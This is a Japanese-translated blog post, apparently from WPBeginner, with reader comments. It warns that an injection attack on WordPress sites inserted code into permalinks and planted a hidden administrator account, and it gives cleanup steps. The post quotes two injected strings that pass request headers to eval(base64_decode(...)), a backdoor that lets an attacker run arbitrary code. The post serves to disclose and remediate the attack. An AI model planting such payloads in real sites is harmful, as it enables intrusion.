最近のSQL攻撃により、多くのサイトが被害を受けており、コードがサイトに注入されています。このMySQLインジェクションは、パーマリンクを無効にすることで影響を与えます。その結果、ブログ投稿のURLが機能しなくなります。この攻撃では多数のWordPressブログが標的となりました。Andy Soward氏がこの件を私たちに知らせてくれたことに感謝します。
この攻撃により、パーマリンク構造に追加されたコードのいずれかが存在していました:
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
これらの引用符はサイト上のすべてのパーマリンクに追加され、手動で削除しない限り変更できません。
これを修正するには、以下に移動してください。
設定 > パーマリンク で上記のコードを削除し、デフォルトのコードを置き換えてください。
次にやるべきことは、ユーザーに移動することです。複数の管理者がいることがわかります。名前は表示されませんが、カウントが増加していることがわかります。したがって、やるべきことは、すべてのユーザーを見て、最後に登録したユーザーを見つけることです。そのユーザーの上にマウスを置いてリンクを取得します。コードのuserid=を、その数字に1を追加して変更します。たとえば、表示できる最後のユーザーがユーザー番号2だった場合、それに1を追加して3にします。隠された管理者は、最初の名前として奇妙なコードを持っているはずです。そのコードを削除し、購読者に設定します。その後戻って削除します。
これで問題が解決するはずです。PHPMyAdminにアクセスして、ユーザーを削除することもできます。そこにユーザーが表示されるからです。
できるだけ早くこのニュースを広めたいので、ユーザーは最新情報を得ることができます。ブログが感染していないことを確認してください。WordPressがすぐにリリースされることを願っています。
また、WordPress管理画面を保護するためにこれらの対策のいくつかを実装していない場合。

ahmed_alaaedin
私のウェブサイトのデータベースは数日前にインジェクションされ、各投稿またはページのURLの後に奇妙な文字や単語が追加されました。設定:パーマリンクやユーザーメニューに何も奇妙なものが見つかりませんでした。この問題を解決するにはどうすればよいですか?私のホスティング会社は、感染したデータベースのバックアップも持っています!
WordPressユーザー
これに2回やられました。
初めての時はwasupプラグインのSQLインジェクションでしたが、今回はよくわかりません。ホスティングプロバイダーにブロックされました。
アカウントが復旧したらWordPressを削除します。もううんざりです!
編集スタッフ
WordPressのせいではなく、おそらくあなたのホスティングセキュリティがあまり良くないのではないでしょうか…
管理者
ジョーイ
これで何がわかりましたか?私も同じ問題に遭遇しました。私のアカウント上のすべてのWPサイトが同じ問題を抱えています。
lerrkin
こんにちは。
興味深いURL https://www.wpbeginner.com/wp-tutorials/11-vital-tips-and-hacks-to-protect-your-wordpress-admin-area/ がここからリンクされていますが、空白ページが表示されます。
Code contains this comment: ‘‘.
That’s WP Super Cache’s bug http://wordpress.org/support/topic/315446, and it seems present here… So update WP Super Cache, please. I hope read that tips soon
編集スタッフ
このコメントは大変感謝しております。問題はWP Super Cacheではなく、WP External Linkというプラグインが原因だと考えています。WP-Super Cacheを2回アンインストールして再インストールしましたが、その後、すべてが正常に機能していた開発サーバーと比較しました。違いはこのプラグインでした。そのプラグインを削除すると機能しました。これでその投稿を読むことができます。
管理者
lerrkin
Maybe that was WP External Link and Super Cache conflict…
Text was “Page not cached by WP Super Cache. No closing HTML tag. Check your theme”.
I see my pasted WP-Super-Cache html comment above works as html comment and is invisible
So last Super Cache ver. promises to do not html validity check.
ああ、読んでいます!
どうもありがとうございます!
Roseli A. Bakar
Thanks for highlighting this